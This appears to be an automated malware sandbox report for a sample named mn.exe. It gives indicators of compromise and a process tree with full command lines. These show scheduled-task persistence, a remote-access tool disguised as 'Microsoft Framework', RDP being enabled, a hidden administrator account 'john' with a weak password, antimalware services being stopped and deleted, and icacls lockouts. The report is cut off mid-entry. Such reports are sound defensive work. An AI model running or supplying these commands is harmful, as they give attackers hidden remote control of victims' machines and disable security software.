ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mn.exe

NTFS ADS 1 IoCs

Processes:

mn.exe

description ioc process

File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ mn.exe
Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

952 regedit.exe
1344 regedit.exe
Runs net.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	mn.exe

pid	process
952	regedit.exe
1344	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

mn.exenetsh.exerutserv.exeicacls.exerutserv.exerfusclient.exewinit.exetaskhost.exetaskhost.exe

pid	process
1856	mn.exe
1856	mn.exe
1856	mn.exe
1856	mn.exe
1856	mn.exe
1156	netsh.exe
1156	netsh.exe
1156	netsh.exe
1156	netsh.exe
1960	rutserv.exe
1960	rutserv.exe
304	icacls.exe
304	icacls.exe
240	rutserv.exe
240	rutserv.exe
240	rutserv.exe
240	rutserv.exe
1712	rfusclient.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1700	winit.exe
1568	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe
1028	taskhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskhostw.exetaskhost.exe

pid process

1136 taskhostw.exe
1028 taskhost.exe
Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

472
2248
2248
2248
2248
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

1708 rfusclient.exe

pid	process
1136	taskhostw.exe
1028	taskhost.exe

pid	process
472
2248
2248
2248
2248

pid	process
1708	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

netsh.exeicacls.exerutserv.exetaskkill.exetaskkill.exeRDPWInst.exeMicrosoftHost.exe

description	pid	process
Token: SeDebugPrivilege	1156	netsh.exe
Token: SeDebugPrivilege	304	icacls.exe
Token: SeTakeOwnershipPrivilege	240	rutserv.exe
Token: SeTcbPrivilege	240	rutserv.exe
Token: SeTcbPrivilege	240	rutserv.exe
Token: SeDebugPrivilege	1824
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeDebugPrivilege	3052	RDPWInst.exe
Token: SeLockMemoryPrivilege	368	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	368	MicrosoftHost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

netsh.exerutserv.exeicacls.exerutserv.exe

pid process

1156 netsh.exe
1960 rutserv.exe
304 icacls.exe
240 rutserv.exe

pid	process
1156	netsh.exe
1960	rutserv.exe
304	icacls.exe
240	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mn.exewini.exeWScript.execmd.execmd.execmd.execheat.exe

description	pid	process	target process
PID 1856 wrote to memory of 1516	1856	mn.exe	schtasks.exe
PID 1856 wrote to memory of 1516	1856	mn.exe	schtasks.exe
PID 1856 wrote to memory of 1516	1856	mn.exe	schtasks.exe
PID 1856 wrote to memory of 1516	1856	mn.exe	schtasks.exe
PID 1856 wrote to memory of 1440	1856	mn.exe	wini.exe
PID 1856 wrote to memory of 1440	1856	mn.exe	wini.exe
PID 1856 wrote to memory of 1440	1856	mn.exe	wini.exe
PID 1856 wrote to memory of 1440	1856	mn.exe	wini.exe
PID 1440 wrote to memory of 568	1440	wini.exe	WScript.exe
PID 1440 wrote to memory of 568	1440	wini.exe	WScript.exe
PID 1440 wrote to memory of 568	1440	wini.exe	WScript.exe
PID 1440 wrote to memory of 568	1440	wini.exe	WScript.exe
PID 1440 wrote to memory of 1700	1440	wini.exe	winit.exe
PID 1440 wrote to memory of 1700	1440	wini.exe	winit.exe
PID 1440 wrote to memory of 1700	1440	wini.exe	winit.exe
PID 1440 wrote to memory of 1700	1440	wini.exe	winit.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 568 wrote to memory of 964	568	WScript.exe	cmd.exe
PID 964 wrote to memory of 952	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 952	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 952	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 952	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 1344	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 1344	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 1344	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 1344	964	cmd.exe	regedit.exe
PID 964 wrote to memory of 1052	964	cmd.exe	timeout.exe
PID 964 wrote to memory of 1052	964	cmd.exe	timeout.exe
PID 964 wrote to memory of 1052	964	cmd.exe	timeout.exe
PID 964 wrote to memory of 1052	964	cmd.exe	timeout.exe
PID 1856 wrote to memory of 560	1856	mn.exe	cheat.exe
PID 1856 wrote to memory of 560	1856	mn.exe	cheat.exe
PID 1856 wrote to memory of 560	1856	mn.exe	cheat.exe
PID 1856 wrote to memory of 560	1856	mn.exe	cheat.exe
PID 1856 wrote to memory of 1008	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1008	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1008	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1008	1856	mn.exe	cmd.exe
PID 1008 wrote to memory of 1340	1008	cmd.exe	sc.exe
PID 1008 wrote to memory of 1340	1008	cmd.exe	sc.exe
PID 1008 wrote to memory of 1340	1008	cmd.exe	sc.exe
PID 1008 wrote to memory of 1340	1008	cmd.exe	sc.exe
PID 1856 wrote to memory of 1048	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1048	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1048	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1048	1856	mn.exe	cmd.exe
PID 1048 wrote to memory of 332	1048	cmd.exe	sc.exe
PID 1048 wrote to memory of 332	1048	cmd.exe	sc.exe
PID 1048 wrote to memory of 332	1048	cmd.exe	sc.exe
PID 1048 wrote to memory of 332	1048	cmd.exe	sc.exe
PID 1856 wrote to memory of 1576	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1576	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1576	1856	mn.exe	cmd.exe
PID 1856 wrote to memory of 1576	1856	mn.exe	cmd.exe
PID 964 wrote to memory of 1156	964	cmd.exe	rutserv.exe
PID 964 wrote to memory of 1156	964	cmd.exe	rutserv.exe
PID 964 wrote to memory of 1156	964	cmd.exe	rutserv.exe
PID 964 wrote to memory of 1156	964	cmd.exe	rutserv.exe
PID 560 wrote to memory of 1568	560	cheat.exe	taskhost.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1052 attrib.exe
800 attrib.exe
2676 attrib.exe
3036 attrib.exe
2996 attrib.exe

pid	process
1052	attrib.exe
800	attrib.exe
2676	attrib.exe
3036	attrib.exe
2996	attrib.exe

C:\Users\Admin\AppData\Local\Temp\mn.exe
"C:\Users\Admin\AppData\Local\Temp\mn.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15
2⤵
- Creates scheduled task(s)
PID:1516

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:952

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:1344

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:1052

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
PID:1156

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1960

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
PID:304

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:1052

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:800

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:1552

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:1136

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:2116

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
4⤵
PID:2764

C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:2664

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:560

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1568

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:1136

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
4⤵
- Executes dropped EXE
PID:2148

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
6⤵
- Loads dropped DLL
PID:2276

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
PID:1824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:2624

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:2904

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:2896

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:744

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:2464

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
8⤵
- Loads dropped DLL
PID:2460

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:2632

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:2616

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:2668

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:2672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:2656

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:2788

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:2800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:2676

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:2988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:1256

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:1184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:1580

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:1836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:1960

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:2868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:1956

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:2880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:2924

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:2976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:2936

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:2940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:2932

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:2064

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2668

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:2432

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:1060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:2012

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2676

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3036

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:2996

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
4⤵
- Drops file in Drivers directory
PID:2556

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:2616

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:2772

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:2800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
2⤵
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
3⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
2⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
3⤵
PID:332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
2⤵
PID:1576

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
3⤵
PID:1504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
2⤵
PID:1624

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
3⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:824

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
2⤵
PID:860

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
3⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
2⤵
PID:676

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
3⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
2⤵
PID:1028

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
3⤵
PID:1596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
2⤵
PID:1556

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
3⤵
PID:1336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
2⤵
PID:292

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
3⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
2⤵
PID:744

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
2⤵
PID:1812

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
2⤵
PID:1504

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
2⤵
PID:1376

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
2⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
2⤵
PID:1708

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
2⤵
PID:824

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
2⤵
PID:1052

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
2⤵
PID:800

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
2⤵
PID:2108

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
2⤵
PID:2240

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
2⤵
PID:2296

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
2⤵
PID:2368

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
2⤵
PID:2392

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
2⤵
PID:2408

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
2⤵
PID:2476

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
2⤵
PID:2656

C:\Windows\SysWOW64\icacls.exe
